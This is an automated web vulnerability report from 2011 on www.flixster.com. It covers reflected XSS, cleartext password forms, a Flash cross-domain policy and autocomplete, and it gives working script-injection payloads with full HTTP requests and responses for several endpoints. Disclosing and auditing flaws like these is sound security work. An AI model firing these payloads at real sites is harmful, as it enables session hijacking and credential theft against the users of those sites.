XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.flixster.com

Report generated by XSS.CX at Thu Aug 18 06:10:01 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in flixster.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://www.flixster.com/people/meet [REST URL parameter 2]

1.2. http://www.flixster.com/people/meet [name of an arbitrarily supplied request parameter]

1.3. http://www.flixster.com/userAuth.do [redirectTarget parameter]

1.4. http://www.flixster.com/ [Referer HTTP header]

1.5. http://www.flixster.com/people/meet [Referer HTTP header]

1.6. http://www.flixster.com/userAuth.do [Referer HTTP header]

2. Cleartext submission of password

2.1. http://www.flixster.com/

2.2. http://www.flixster.com/people/meet

2.3. http://www.flixster.com/userAuth.do

3. Flash cross-domain policy

4. Password field with autocomplete enabled

4.1. http://www.flixster.com/

4.2. http://www.flixster.com/people/meet

4.3. http://www.flixster.com/userAuth.do

5. Referer-dependent response

5.1. http://www.flixster.com/people/meet

5.2. http://www.flixster.com/sitemap/photos

5.3. http://www.flixster.com/userAuth.do

6. Cross-domain script include

6.1. http://www.flixster.com/

6.2. http://www.flixster.com/people/meet

6.3. http://www.flixster.com/sitemap/photos

6.4. http://www.flixster.com/userAuth.do

7. Robots.txt file

8. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.flixster.com/people/meet [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /people/meet

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de7f"><script>alert(1)</script>ce87354dfd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /people/meet4de7f"><script>alert(1)</script>ce87354dfd6 HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:23 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<input type="hidden" name="redirectTarget" value="/people/meet4de7f"><script>alert(1)</script>ce87354dfd6" />
...[SNIP]...

1.2. http://www.flixster.com/people/meet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /people/meet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a60d6"><script>alert(1)</script>0a428100641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /people/meet?a60d6"><script>alert(1)</script>0a428100641=1 HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:22 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<input type="hidden" name="redirectTarget" value="/people/meet?a60d6"><script>alert(1)</script>0a428100641=1" />
...[SNIP]...

1.3. http://www.flixster.com/userAuth.do [redirectTarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /userAuth.do

Issue detail

The value of the redirectTarget request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4ab"><script>alert(1)</script>fabbb5fa69cba144f was submitted in the redirectTarget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /userAuth.do?userauthAction=doLogin&redirectTarget=%2Fpeople%2Fmeetcc4ab"><script>alert(1)</script>fabbb5fa69cba144f&userauthEmail=ss&userauthPassword=&userauthRemember=on&submit=Login+to+Flixster+%3E HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/people/meet
Cache-Control: max-age=0
Origin: http://www.flixster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.2.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:32 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<input type="hidden" name="redirectTarget" value="/people/meetcc4ab"><script>alert(1)</script>fabbb5fa69cba144f" />
...[SNIP]...

1.4. http://www.flixster.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 58329<script>alert(1)</script>2cf49562bbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=58329<script>alert(1)</script>2cf49562bbf

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:39:55 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmln
...[SNIP]...
<a href="/search?q=58329%3Cscript%3Ealert%281%29%3C%2Fscript%3E2cf49562bbf">58329<script>alert(1)</script>2cf49562bbf</a>
...[SNIP]...

1.5. http://www.flixster.com/people/meet [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /people/meet

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1058b<script>alert(1)</script>77e4ab9ff14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /people/meet HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=1058b<script>alert(1)</script>77e4ab9ff14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:23 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<a href="/search?q=1058b%3Cscript%3Ealert%281%29%3C%2Fscript%3E77e4ab9ff14">1058b<script>alert(1)</script>77e4ab9ff14</a>
...[SNIP]...

1.6. http://www.flixster.com/userAuth.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /userAuth.do

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ae002<script>alert(1)</script>5b6a9c3c1f3bee60d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /userAuth.do?userauthAction=doLogin&redirectTarget=%2Fpeople%2Fmeet&userauthEmail=ss&userauthPassword=&userauthRemember=on&submit=Login+to+Flixster+%3E HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ae002<script>alert(1)</script>5b6a9c3c1f3bee60d
Cache-Control: max-age=0
Origin: http://www.flixster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.2.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:33 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<a href="/search?q=ae002%3Cscript%3Ealert%281%29%3C%2Fscript%3E5b6a9c3c1f3bee60d">ae002<script>alert(1)</script>5b6a9c3c1f3bee60d</a>
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.flixster.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:39:52 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmln
...[SNIP]...
<div class="boxContent clearfix">
<form name="loginForm" action="/userAuth.do" method="post">
<input type="hidden" name="userauthAction" value="doLogin" />
...[SNIP]...
<td colspan="2"><input type="password" class="text" id="userauthPassword" name="userauthPassword" value="" maxlength="100" tabindex="2" /></td>
...[SNIP]...

2.2. http://www.flixster.com/people/meet  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /people/meet

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /people/meet HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:21 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<!-- disable ssl-based login for now. something is fishy based on exit rates for the login page. miguel 8/7/2009 -->                
<form name="login" action="/userAuth.do" method="post" style="width:59%; margin:0 auto;float:left;text-align:left;">
<input type="hidden" name="userauthAction" value="doLogin" />
...[SNIP]...
<td align="left"><input type="password" name="userauthPassword" maxlength="50" tabindex="2" /></td>
...[SNIP]...

2.3. http://www.flixster.com/userAuth.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /userAuth.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /userAuth.do HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/people/meet
Content-Length: 138
Cache-Control: max-age=0
Origin: http://www.flixster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.2.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

userauthAction=doLogin&redirectTarget=%2Fpeople%2Fmeet&userauthEmail=ss&userauthPassword=&userauthRemember=on&submit=Login+to+Flixster+%3E

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:31 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
<!-- disable ssl-based login for now. something is fishy based on exit rates for the login page. miguel 8/7/2009 -->                
<form name="login" action="/userAuth.do" method="post" style="width:59%; margin:0 auto;float:left;text-align:left;">
<input type="hidden" name="userauthAction" value="doLogin" />
...[SNIP]...
<td align="left"><input type="password" name="userauthPassword" maxlength="50" tabindex="2" /></td>
...[SNIP]...

3. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:39:52 GMT
Server: Apache
Last-Modified: Mon, 15 Aug 2011 19:09:33 GMT
ETag: "1aa"
Accept-Ranges: bytes
Content-Length: 426
Cache-Control: max-age=86400
Expires: Fri, 19 Aug 2011 10:39:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.flixster.com" />
<allow-access-from domain="flixster.com" />
<allow-access-from domain="www.flixster.com" />

<allow-access-from domain="*.flixstercdn.com" />

<allow-access-from domain="*.rottentomatoes.com" />
<allow-access-from domain="rottentomatoes.com" />
<allow-access-from domain="www.rottentomatoes.com" />
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://www.flixster.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:39:52 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


